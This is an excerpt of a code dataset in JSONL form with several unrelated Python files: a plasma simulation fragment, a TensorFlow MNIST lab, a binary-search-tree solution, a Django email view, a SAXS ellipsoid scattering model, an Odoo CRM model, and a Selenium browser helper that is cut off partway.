calculations[:,6] = ke * np.divide(np.multiply(q0[:,0],PDB[:,-2]), calculations[:,2])\r\n calculations[:,7] = np.divide(np.multiply(calculations[:,6],calculations[:,4]), PDB[:,-1])\r\n calculations[:,8] = np.divide(np.multiply(calculations[:,6],calculations[:,5]), PDB[:,-1])\r\n accels[number,:] = (np.sum(calculations[:,7]),np.sum(calculations[:,8]))\r\n return accels\r\n \r\ndef findEnergy():\r\n velMagEl = np.sqrt(np.power(PDB[:ne,2],2), np.power(PDB[:ne,3],2))\r\n velMagIo = np.sqrt(np.power(PDB[ne:,2],2), np.power(PDB[ne:,3],2))\r\n return np.sum(np.sum(velMagEl)), np.sum(np.sum(velMagIo))\r\n\r\nfig, (ax, deb) = plt.subplots(1, 2)\r\nfig.canvas.set_window_title('Plasma Simulation')\r\ntime.sleep(10)\r\n\r\nenergyE = []\r\nenergyI = []\r\nstepNum = 1\r\nstep = []\r\n\r\nwhile True:\r\n energies = findEnergy()\r\n energyE.append(np.log10(energies[0]))\r\n energyI.append(np.log10(energies[1]))\r\n step.append(stepNum)\r\n if stepNum == 0:\r\n time.sleep(10)\r\n stepNum += 1\r\n ax.plot(PDB[:ne,0], PDB[:ne,1], 'o', color = \"blue\", alpha = 0.7)\r\n ax.plot(PDB[ne:,0], PDB[ne:,1], 'o', color = \"red\", alpha = 0.7)\r\n ax.set_xlim([0,width])\r\n ax.set_ylim([0,height])\r\n deb.plot(step, energyE, color = \"blue\", alpha = 0.7)\r\n deb.plot(step, energyI, color = \"red\", alpha = 0.7)\r\n plt.pause(0.001)\r\n plt.draw()\r\n ax.cla()\r\n deb.cla()\r\n PDB[:,4:6] = forceFinder()\r\n PDB = timeStep(1E-12)\r\n if stepNum > 200:\r\n del energyE[0]\r\n del energyI[0]\r\n del step[0]","sub_path":"PlasmaSim.py","file_name":"PlasmaSim.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387521958","text":"# Lab 7 Learning rate and Evaluation\nimport tensorflow as tf\nimport random\n# import matplotlib.pyplot as plt\ntf.set_random_seed(777) # for reproducibility\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n\n# MNIST data image of shape 28 * 28 = 784\nX = tf.placeholder(tf.float32, [None, 784])\n# 0 - 9 digits recognition = 10 classes\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n\nwith tf.name_scope(\"layer1\") as scope:\n W1 = tf.get_variable(\"W1\", shape=[784, 256],\n initializer=tf.contrib.layers.xavier_initializer())\n b1 = tf.Variable(tf.random_normal([256]), name='bias1')\n layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)\n\n w1_hist = tf.summary.histogram(\"weights1\", W1)\n b1_hist = tf.summary.histogram(\"biases1\", b1)\n layer1_hist = tf.summary.histogram(\"layer1\", layer1)\nwith tf.name_scope(\"layer2\") as scope:\n W2 = tf.get_variable(\"W2\", shape=[256, 256],\n initializer=tf.contrib.layers.xavier_initializer())\n b2 = tf.Variable(tf.random_normal([256]), name='bias2')\n layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)\n\n w2_hist = tf.summary.histogram(\"weights2\", W2)\n b2_hist = tf.summary.histogram(\"biases2\", b2)\n layer2_hist = tf.summary.histogram(\"layer2\", layer2)\n\nwith tf.name_scope(\"layer3\") as scope:\n W3 = tf.get_variable(\"W3\", shape=[256, 10],\n initializer=tf.contrib.layers.xavier_initializer())\n b3 = tf.Variable(tf.random_normal([nb_classes]), name='bias3')\n hypothesis = tf.matmul(layer2, W3) + b3\n w3_hist = tf.summary.histogram(\"weights3\", W3)\n b3_hist = tf.summary.histogram(\"biases3\", b3)\n layer3_hist = tf.summary.histogram(\"hypothesis\", hypothesis)\n\n\n# cost/loss function\n\nwith tf.name_scope(\"cost\") as scope:\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=Y))\n cost_summ = tf.summary.scalar(\"cost\", cost)\n\nwith tf.name_scope(\"train\") as scope:\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.arg_max(hypothesis, 1), tf.arg_max(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\naccuracy_summ = tf.summary.scalar(\"accuracy\", accuracy)\n# parameters\ntraining_epochs = 15\nbatch_size = 100\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n sess.run(tf.global_variables_initializer())\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/mnist_NN_r0_1\")\n writer.add_graph(sess.graph) # Show the graph\n # Training cycle\n for epoch in range(training_epochs):\n \n avg_cost = 0\n total_batch = int(mnist.train.num_examples / batch_size)\n\n\n for step in range(total_batch):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n summary, c, _ = sess.run([merged_summary, cost, optimizer], feed_dict={\n X: batch_xs, Y: batch_ys})\n\n writer.add_summary(summary, global_step=step)\n avg_cost += c / total_batch\n\n print('Epoch:', '%04d' % (epoch + 1),\n 'cost =', '{:.9f}'.format(avg_cost))\n\n print(\"Learning finished\")\n\n # # Test the model using test sets\n print(\"Accuracy: \", accuracy.eval(session=sess, feed_dict={\n X: mnist.test.images, Y: mnist.test.labels}))\n\n # # Get one and predict\n # r = random.randint(0, mnist.test.num_examples - 1)\n # print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))\n # print(\"Prediction: \", sess.run(\n # tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))\n\n # don't know why this makes Travis Build error.\n # plt.imshow(\n # mnist.test.images[r:r + 1].reshape(28, 28),\n # cmap='Greys',\n # interpolation='nearest')\n # plt.show()\n\n\n'''\nEpoch: 0001 cost = 2.868104637\nEpoch: 0002 cost = 1.134684615\nEpoch: 0003 cost = 0.908220728\nEpoch: 0004 cost = 0.794199896\nEpoch: 0005 cost = 0.721815854\nEpoch: 0006 cost = 0.670184430\nEpoch: 0007 cost = 0.630576546\nEpoch: 0008 cost = 0.598888191\nEpoch: 0009 cost = 0.573027079\nEpoch: 0010 cost = 0.550497213\nEpoch: 0011 cost = 0.532001859\nEpoch: 0012 cost = 0.515517795\nEpoch: 0013 cost = 0.501175288\nEpoch: 0014 cost = 0.488425370\nEpoch: 0015 cost = 0.476968593\nLearning finished\nAccuracy: 0.888\n'''\n","sub_path":"lab-07-4-mnist_introduction.py","file_name":"lab-07-4-mnist_introduction.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"582316901","text":"import unittest\nfrom tree import TreeNode\n\n\ndef bst(nums, left, right):\n if left > right:\n return None\n\n index = int((left + right) / 2)\n node = TreeNode(nums[index])\n\n node.left = bst(nums, left, index - 1)\n node.right = bst(nums, index + 1, right)\n return node\n\n\nclass Solution(object):\n\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n return bst(nums, 0, len(nums) - 1)\n\n\nclass Test(unittest.TestCase):\n\n def test(self):\n self.assertEqual(\n Solution().sortedArrayToBST([1, 2, 3, 4, 5, 6]).to_array(),\n [3, 1, 5, None, 2, 4, 6])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"p108_recursion.py","file_name":"p108_recursion.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542799693","text":"from django.shortcuts import render\r\nfrom django.core.mail import send_mail\r\nfrom .forms import SendMail\r\nfrom django.http import HttpResponse\r\n\r\ndef home_view(request):\r\n if request.method == 'POST':\r\n form=SendMail(request.POST)\r\n \r\n if form.is_valid():\r\n subject=form.cleaned_data[\"subject\"]\r\n email=form.cleaned_data[\"to\"]\r\n message=form.cleaned_data[\"message\"]\r\n url=request.build_absolute_uri()\r\n print(url)\r\n send_mail(subject,message+\"\\n\"+url,\"admin@gmail.com\",[email])\r\n return HttpResponse(\"successfully Send Email\")\r\n else:\r\n form=SendMail()\r\n context={\r\n 'form':form,\r\n }\r\n\r\n return render(request,\"core/home.html\",context)\r\n","sub_path":"day51/myproject/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"264210173","text":"####Please do not remove lines below####\nfrom lmfit import Parameters\nimport numpy as np\nimport sys\nimport os\nsys.path.append(os.path.abspath('.'))\nsys.path.append(os.path.abspath('./Functions'))\nsys.path.append(os.path.abspath('./Fortran_routines'))\nfrom functools import lru_cache\n####Please do not remove lines above####\n\n####Import your modules below if needed####\n#from ff_ellipsoid import ff_ellipsoid_ml_asaxs\nfrom Chemical_Formula import Chemical_Formula\nfrom PeakFunctions import LogNormal, Gaussian\nfrom Structure_Factors import hard_sphere_sf, sticky_sphere_sf\nfrom utils import find_minmax, calc_rho, create_steps\nfrom functools import lru_cache\nimport time\n\nfrom numba import njit, prange\n\n@njit(parallel=True,cache=True)\ndef ellipsoid_ml_asaxs(q,Rx,RzRatio,rho,eirho,adensity,Nalf):\n dalf = 3.14159 / Nalf\n NLayers=len(rho)\n fft = np.zeros_like(q)\n ffs = np.zeros_like(q)\n ffc = np.zeros_like(q)\n ffr = np.zeros_like(q)\n for i in prange(len(q)):\n tRx = 0.0\n tRz = 0.0\n for j in prange(Nalf):\n alf = j * dalf\n tRx = 0.0\n tRz = 0.0\n tft = 0.0\n tfs = 0.0\n tfr = 0.0\n for k in range(NLayers-1):\n tRx += Rx[k]\n tRz += Rx[k] * RzRatio[k]\n Rx2 = tRx * tRx\n Rz2 = tRz * tRz\n V = 4 * 3.14159 * tRz * tRx ** 2 / 3.0\n rt = np.sqrt(Rx2 * np.sin(alf) ** 2 + Rz2 * np.cos(alf) ** 2)\n fac = 3 * V * (np.sin(q[i] * rt) - q[i] * rt * np.cos(q[i] * rt)) / (q[i] * rt) ** 3\n ft = (rho[k] - rho[k + 1]) * fac\n fs = (eirho[k] - eirho[k + 1]) * fac\n fr = (adensity[k] - adensity[k + 1]) * fac\n fc = fs * fr\n tft += ft\n tfs += fs\n tfr += fr\n fft[i] += np.abs(tft) ** 2 * np.sin(alf)\n ffs[i] += tfs ** 2 * np.sin(alf)\n ffc[i] += tfs * tfr * np.sin(alf)\n ffr[i] += tfr ** 2 * np.sin(alf)\n fft[i] *= dalf\n ffs[i] *= dalf\n ffc[i] *= dalf\n ffr[i] *= dalf\n return fft, ffs, ffc, ffr\n\n\nclass Ellipsoid_Uniform: #Please put the class name same as the function name\n def __init__(self, x=0, Np=10, error_factor=1.0, term='Total', dist='Gaussian', Energy=None, relement='Au', Nalf=200,\n NrDep='False', norm=1.0, norm_err=0.01, Rsig=0.0, sbkg=0.0, cbkg=0.0, abkg=0.0, D=1.0, phi=0.1, U=-1.0,\n SF='None', mpar={'Layers':{'Material': ['Au', 'H2O'], 'Density': [19.32, 1.0], 'SolDensity': [1.0, 1.0],\n 'Rmoles': [1.0, 1.0], 'R': [1.0, 0.0],'RzRatio':[1.0,1.0]}}):\n \"\"\"\n Documentation\n Calculates the Energy dependent form factor of multilayered oblate nanoparticles with different materials\n\n x : Reciprocal wave-vector 'Q' inv-Angs in the form of a scalar or an array\n relement : Resonant element of the nanoparticle. Default: 'Au'\n Energy : Energy of X-rays in keV at which the form-factor is calculated. Default: None\n Np : No. of points with which the size distribution will be computed. Default: 10\n NrDep : Energy dependence of the non-resonant element. Default= 'False' (Energy independent), 'True' (Energy dependent)\n dist : The probability distribution fucntion for the radii of different interfaces in the nanoparticles. Default: Gaussian\n Nalf : Number of azimuthal angle points for angular averaging\n norm : The density of the nanoparticles in nanoMolar (nanoMoles/Liter)\n norm_err :\n sbkg : Constant incoherent background for SAXS-term\n cbkg : Constant incoherent background for cross-term\n abkg : Constant incoherent background for Resonant-term\n error_factor: Error-factor to simulate the error-bars\n term : 'SAXS-term' or 'Cross-term' or 'Resonant-term' or 'Total'\n D : Hard Sphere Diameter\n phi : Volume fraction of particles\n U : The sticky-sphere interaction energy\n SF : Type of structure factor. Default: 'None'\n Rsig : Width of distribution of radii\n mpar : Multi-parameter which defines the following including the solvent/bulk medium which is the last one. Default: 'H2O'\n Material ('Materials' using chemical formula),\n Density ('Density' in gm/cubic-cms),\n Density of solvent ('SolDensity' in gm/cubic-cms) of the particular layer\n Mole-fraction ('Rmoles') of resonant element in the material)\n Radii ('R' in Angs), and\n Height to Radii ratio ('RzRatio' ratio)\n \"\"\"\n if type(x) == list:\n self.x = np.array(x)\n else:\n self.x = x\n self.Nalf = Nalf\n self.norm = norm\n self.norm_err = norm_err\n self.sbkg = sbkg\n self.cbkg = cbkg\n self.abkg = abkg\n self.dist = dist\n self.Np = Np\n self.Energy = Energy\n self.relement = relement\n self.NrDep = NrDep\n # self.rhosol=rhosol\n self.error_factor = error_factor\n self.D = D\n self.phi = phi\n self.U = U\n self.Rsig = Rsig\n self.__mpar__ = mpar # If there is any multivalued parameter\n self.SF = SF\n self.term = term\n self.choices = {'dist': ['Gaussian', 'LogNormal'], 'NrDep': ['True', 'False'],\n 'SF': ['None', 'Hard-Sphere', 'Sticky-Sphere'],\n 'term': ['SAXS-term', 'Cross-term', 'Resonant-term',\n 'Total']} # If there are choices available for any fixed parameters\n self.__cf__ = Chemical_Formula()\n self.__fit__ = False\n self.output_params = {}\n self.output_params = {'scaler_parameters': {}}\n self.__mkeys__=list(self.__mpar__.keys())\n self.init_params()\n\n def init_params(self):\n \"\"\"\n Define all the fitting parameters like\n self.params.add('sig',value = 0, vary = 0, min = -np.inf, max = np.inf, expr = None, brute_step = None)\n \"\"\"\n self.params = Parameters()\n self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('D', value=self.D, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('phi', value=self.phi, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('sbkg', value=self.sbkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('cbkg', value=self.cbkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('abkg', value=self.abkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('U', value=self.U, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('Rsig', value=self.Rsig, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n for mkey in self.__mpar__.keys():\n for key in self.__mpar__[mkey].keys():\n if key != 'Material':\n for i in range(len(self.__mpar__[mkey][key])):\n self.params.add('__%s_%s_%03d' % (mkey, key, i), value=self.__mpar__[mkey][key][i], vary=0, min=-np.inf,\n max=np.inf, expr=None, brute_step=0.1)\n\n\n @lru_cache(maxsize=10)\n def calc_Rdist(self, R, Rsig, dist, N):\n R = np.array(R)\n totalR = np.sum(R[:-1])\n if Rsig > 0.001:\n fdist = eval(dist + '.' + dist + '(x=0.001, pos=totalR, wid=Rsig)')\n if dist == 'Gaussian':\n rmin, rmax = max(0.001, totalR - 5 * Rsig), totalR + 5 * Rsig\n dr = np.linspace(rmin, rmax, N)\n else:\n rmin, rmax = max(0.001, np.exp(np.log(totalR) - 5 * Rsig)), np.exp(np.log(totalR) + 5 * Rsig)\n dr = np.logspace(rmin, rmax, N, base=np.exp(1.0))\n fdist.x = dr\n rdist = fdist.y()\n sumdist = np.sum(rdist)\n rdist = rdist / sumdist\n return dr, rdist, totalR\n else:\n return [totalR], [1.0], totalR\n\n @lru_cache(maxsize=10)\n def ellipsoid(self, q, R, RzRatio, Rsig, rho, eirho, adensity, dist='Gaussian', Np=10, Nalf=1000):\n q = np.array(q)\n dr, rdist, totalR = self.calc_Rdist(R, Rsig, dist, Np)\n form = np.zeros_like(q)\n eiform = np.zeros_like(q)\n aform = np.zeros_like(q)\n cform = np.zeros_like(q)\n pfac = (2.818e-5 * 1.0e-8) ** 2\n for i in range(len(dr)):\n r = np.array(R) * (1 + (dr[i] - totalR) / totalR)\n fft,ffs,ffc,ffr = ellipsoid_ml_asaxs(q, r, RzRatio, rho, eirho, adensity, Nalf)\n form = form + rdist[i] * fft\n eiform = eiform + rdist[i] * ffs\n aform = aform + rdist[i] * ffr\n cform = cform + rdist[i] * ffc\n return pfac * form, pfac * eiform, pfac * aform, np.abs(pfac * cform) # in cm^2\n\n @lru_cache(maxsize=10)\n def ellipsoid_dict(self, q, R, RzRatio, Rsig, rho, eirho, adensity, dist='Gaussian', Np=10, Nalf=1000):\n form, eiform, aform, cform = self.ellipsoid(q, R, RzRatio, Rsig, rho, eirho, adensity, dist=dist, Np=Np, Nalf=Nalf)\n sqf={'Total':form,'SAXS-term':eiform,'Resonant-term':aform,'Cross-term':cform}\n return sqf\n\n def update_params(self):\n mkey=self.__mkeys__[0]\n key = 'Density'\n Nmpar = len(self.__mpar__[mkey][key])\n self.__density__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'SolDensity'\n self.__solDensity__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'Rmoles'\n self.__Rmoles__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'R'\n self.__R__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'RzRatio'\n self.__RzRatio__ = [self.params['__%s_%s_%03d' % (mkey, key, i)].value for i in range(Nmpar)]\n key = 'Material'\n self.__material__ = [self.__mpar__[mkey][key][i] for i in range(Nmpar)]\n\n def y(self):\n \"\"\"\n Define the function in terms of x to return some value\n \"\"\"\n svol = 1.5 * 0.0172 ** 2 / 370 ** 2 # scattering volume in cm^3\n self.update_params()\n rho, eirho, adensity, rhor, eirhor, adensityr = calc_rho(R=tuple(self.__R__), material=tuple(self.__material__),\n relement=self.relement,\n density=tuple(self.__density__),\n sol_density=tuple(self.__solDensity__),\n Energy=self.Energy, Rmoles=tuple(self.__Rmoles__),\n NrDep=self.NrDep)\n major=np.sum(self.__R__)\n minor=np.sum(np.array(self.__R__)*np.array(self.__RzRatio__))\n self.output_params['scaler_parameters']['Diameter (Angstroms)']=2*major\n self.output_params['scaler_parameters']['Height (Angstroms)']=2*minor\n if self.dist=='LogNormal':\n dstd=2 * np.sqrt((np.exp(self.Rsig**2) - 1) * np.exp(2 * np.log(major) + self.Rsig**2))\n hstd=2 * np.sqrt((np.exp(self.Rsig**2) - 1) * np.exp(2 * np.log(minor) + self.Rsig**2))\n self.output_params['scaler_parameters']['Diameter_Std (Angstroms)'] = dstd\n self.output_params['scaler_parameters']['Height_Std (Angstroms)'] = hstd\n else:\n self.output_params['scaler_parameters']['Diameter_Std (Angstroms)'] =2*self.Rsig\n self.output_params['scaler_parameters']['Height_Std (Angstroms)'] = 2 * self.Rsig*minor/major\n if type(self.x) == dict:\n sqf = {}\n key='SAXS-term'\n sqft=self.ellipsoid_dict(tuple(self.x[key]), tuple(self.__R__),\n tuple(self.__RzRatio__), self.Rsig,\n tuple(rho), tuple(eirho), tuple(adensity),\n dist=self.dist, Np=self.Np, Nalf=self.Nalf)\n if self.SF is None:\n struct = np.ones_like(self.x[key]) # hard_sphere_sf(self.x[key], D = self.D, phi = 0.0)\n elif self.SF == 'Hard-Sphere':\n struct = hard_sphere_sf(self.x[key], D=self.D, phi=self.phi)\n else:\n struct = sticky_sphere_sf(self.x[key], D=self.D, phi=self.phi, U=self.U, delta=0.01)\n for key in self.x.keys():\n if key == 'SAXS-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.sbkg # in cm^-1\n if key == 'Cross-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.cbkg # in cm^-1\n if key == 'Resonant-term':\n sqf[key] = self.norm * 6.022e20 *sqft[key] * struct + self.abkg # in cm^-1\n key1='Total'\n total= self.norm * 6.022e20 *sqft[key1] * struct + self.sbkg\n if not self.__fit__:\n dr, rdist, totalR = self.calc_Rdist(tuple(self.__R__), self.Rsig, self.dist, self.Np)\n self.output_params['Distribution'] = {'x': dr, 'y': rdist}\n signal = total\n minsignal = np.min(signal)\n normsignal = signal / minsignal\n norm = np.random.normal(self.norm, scale=self.norm_err / 100.0)\n sqerr = np.random.normal(normsignal * norm, scale=self.error_factor)\n meta = {'Energy': self.Energy}\n if self.Energy is not None:\n self.output_params['simulated_w_err_%.4fkeV' % self.Energy] = {'x': self.x[key],\n 'y': sqerr * minsignal,\n 'yerr': np.sqrt(\n normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n else:\n self.output_params['simulated_w_err'] = {'x': self.x[key], 'y': sqerr * minsignal,\n 'yerr': np.sqrt(normsignal) * minsignal}\n self.output_params['Total'] = {'x': self.x[key], 'y': total}\n for key in self.x.keys():\n self.output_params[key] = {'x': self.x[key], 'y': sqf[key]}\n self.output_params['rho_r'] = {'x': rhor[:, 0], 'y': rhor[:, 1]}\n self.output_params['eirho_r'] = {'x': eirhor[:, 0], 'y': eirhor[:, 1]}\n self.output_params['adensity_r'] = {'x': adensityr[:, 0], 'y': adensityr[:, 1]}\n self.output_params['Structure_Factor'] = {'x': self.x[key], 'y': struct}\n xtmp,ytmp=create_steps(x=self.__R__[:-1],y=self.__Rmoles__[:-1])\n self.output_params['Rmoles_radial']={'x':xtmp,'y':ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__RzRatio__[:-1])\n self.output_params['RzRatio_radial'] = {'x': xtmp, 'y': ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__density__[:-1])\n self.output_params['Density_radial'] = {'x': xtmp, 'y': ytmp}\n else:\n if self.SF is None:\n struct = np.ones_like(self.x)\n elif self.SF == 'Hard-Sphere':\n struct = hard_sphere_sf(self.x, D=self.D, phi=self.phi)\n else:\n struct = sticky_sphere_sf(self.x, D=self.D, phi=self.phi, U=self.U, delta=0.01)\n\n tsqf, eisqf, asqf, csqf = self.ellipsoid(tuple(self.x), tuple(self.__R__), tuple(self.__RzRatio__), self.Rsig,\n tuple(rho), tuple(eirho),\n tuple(adensity), dist=self.dist, Np=self.Np, Nalf=self.Nalf)\n sqf = self.norm * np.array(tsqf) * 6.022e20 * struct + self.sbkg # in cm^-1\n if not self.__fit__: #Generate all the quantities below while not fitting\n asqf = self.norm * np.array(asqf) * 6.022e20 * struct + self.abkg # in cm^-1\n eisqf = self.norm * np.array(eisqf) * 6.022e20 * struct + self.sbkg # in cm^-1\n csqf = self.norm * np.array(csqf) * 6.022e20 * struct + self.cbkg # in cm^-1\n # sqerr = np.sqrt(6.022e20*self.norm*self.flux * tsqf * svol+self.sbkg)\n # sqwerr = (6.022e20*self.norm*tsqf * svol * self.flux+self.sbkg + 2 * (0.5 - np.random.rand(len(tsqf))) * sqerr)\n signal = 6.022e20 * self.norm * np.array(tsqf) * struct + self.sbkg\n minsignal = np.min(signal)\n normsignal = signal / minsignal\n norm = np.random.normal(self.norm, scale=self.norm_err / 100.0)\n sqerr = np.random.normal(normsignal * norm, scale=self.error_factor)\n meta = {'Energy': self.Energy}\n if self.Energy is not None:\n self.output_params['simulated_w_err_%.4fkeV' % self.Energy] = {'x': self.x, 'y': sqerr * minsignal,\n 'yerr': np.sqrt(\n normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n else:\n self.output_params['simulated_w_err'] = {'x': self.x, 'y': sqerr * minsignal,\n 'yerr': np.sqrt(normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n dr, rdist, totalR = self.calc_Rdist(tuple(self.__R__), self.Rsig, self.dist, self.Np)\n self.output_params['Distribution'] = {'x': dr, 'y': rdist}\n self.output_params['Total'] = {'x': self.x, 'y': sqf}\n self.output_params['Resonant-term'] = {'x': self.x, 'y': asqf}\n self.output_params['SAXS-term'] = {'x': self.x, 'y': eisqf}\n self.output_params['Cross-term'] = {'x': self.x, 'y': csqf}\n self.output_params['rho_r'] = {'x': rhor[:, 0], 'y': rhor[:, 1]}\n self.output_params['eirho_r'] = {'x': eirhor[:, 0], 'y': eirhor[:, 1]}\n self.output_params['adensity_r'] = {'x': adensityr[:, 0], 'y': adensityr[:, 1]}\n self.output_params['Structure_Factor'] = {'x': self.x, 'y': struct}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__Rmoles__[:-1])\n self.output_params['Rmoles_radial'] = {'x':xtmp , 'y': ytmp}\n sqf = self.output_params[self.term]['y']\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__RzRatio__[:-1])\n self.output_params['RzRatio_radial'] = {'x': xtmp, 'y': ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__density__[:-1])\n self.output_params['Density_radial'] = {'x': xtmp, 'y': ytmp}\n sqf = self.output_params[self.term]['y']\n return sqf\n\n\nif __name__=='__main__':\n x=np.logspace(-3,0.0,200)\n fun=Ellipsoid_Uniform(x=x)\n print(fun.y())\n","sub_path":"Functions/ASAXS/Ellipsoid_Uniform.py","file_name":"Ellipsoid_Uniform.py","file_ext":"py","file_size_in_byte":20064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"572852649","text":"#-*- coding:utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport time\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\n\nimport babel\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tools.safe_eval import safe_eval\n\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, AccessError\n\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass OrveaCrmLead(models.Model):\n _inherit = 'crm.lead'\n\n\n flag_crm = fields.Boolean(string='Flag', help='Flag' , default=False)\n state_crm = fields.Selection([\n\t('refused', 'Refuse'),\n\t('accepted', 'Accepte'),\n\t('quotation_sent', 'Devis envoye'),\n\t('meeting', 'Rendez-vous prevu'),\n ('contacted', 'Contacte'),\n ('new', 'Nouveau'),\n\t],string=\"State\", default='new')\n activity = fields.Char()\n source = fields.Selection([\n ('inconnu', 'Inconnu'),\n ('evenement', 'Evenement'),\n ('facebook', 'Facebook'),\n ('mailing', 'Mailing'),\n ('reference', 'Reference'),\n ('site_web', 'Site Web'),\n ('autres', 'Autres'),\n ], string='Source')\n\n responsable_id = fields.Many2one('res.partner', string='Responsable',\n help=\"Linked responsable (optional). Usually created when converting the lead.\")\n\n\n @api.model\n def create(self, vals):\n vals['flag_crm'] = True\n return super(OrveaCrmLead, self).create(vals)\n\n\n\n\n\n","sub_path":"orvea_module/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"195544153","text":"import time\nimport copy\nimport numpy as np\nimport sqlite3\nfrom ctypes import windll\n\n\n# import Selenium framework\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver.chrome.options import Options\n\n\n# Given the record information,Return a browser containing the index page (Max trials time = 5)\ndef init_browser(headless=False,\n\t\t\t\t chrome_driver_path='C:\\\\Users\\\\KevinZhu\\\\PycharmProjects\\\\selenium drivers\\\\chromedriver.exe'):\n\n\t\"\"\"\n\tuser32 = windll.user32\n\tgdi32 = windll.gdi32\n\tdc = user32.GetDC(None)\n\tdesktop_width = gdi32.GetDeviceCaps(dc, 8)\n\tdesktop_height = gdi32.GetDeviceCaps(dc, 10)\n\tbrowser_width = desktop_width // 2\n\tbrowser_height = desktop_height - 40\n\t\"\"\"\n\n\tchrome_options = Options()\n\tchrome_options.add_argument(\"--window-size=1920x1080\")\n\tif headless:\n\t\tchrome_options.add_argument(\"--headless\")\n\n\tbrowser = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver_path)\n\n\t\"\"\"\n\tbrowser.set_window_position(x=0, y=0, windowHandle='current')\n\tbrowser.set_window_size(browser_width, browser_height, windowHandle='currentWindow')\n\t\"\"\"\n\n\thandles = browser.window_handles\n\tif len(handles) > 1:\n\t\tbrowser.switch_to.window(handles[1])\n\t\tbrowser.close()\n\t\tbrowser.switch_to.window(handles[0])\n\n\treturn browser\n\n\ndef table_to_2d_nparray(table_elem, by_line=False):\n\ttheads = table_elem.find_elements_by_xpath('./thead')\n\ttbody = table_elem.find_element_by_xpath('./tbody')\n\ttry:\n\t\trows = WebDriverWait(tbody, 5).until(ec.presence_of_all_elements_located((By.XPATH, './tr')))\n\t\tif by_line:\n\t\t\tif len(theads) > 0:\n\t\t\t\ttable = np.empty([len(rows) + 1, 1], dtype=object)\n\t\t\t\ttable[0, 0] = theads[0].text\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttable[i + 1, 0] = rows[i].text\n\t\t\telse:\n\t\t\t\ttable = np.empty([len(rows), 1], dtype=object)\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttable[i, 0] = rows[i].text\n\t\telse:\n\t\t\tcols = [col.text for col in rows[0].find_elements_by_xpath('./td')]\n\t\t\tif len(theads) > 0:\n\t\t\t\ttable = np.empty([len(rows) + 1, len(cols)], 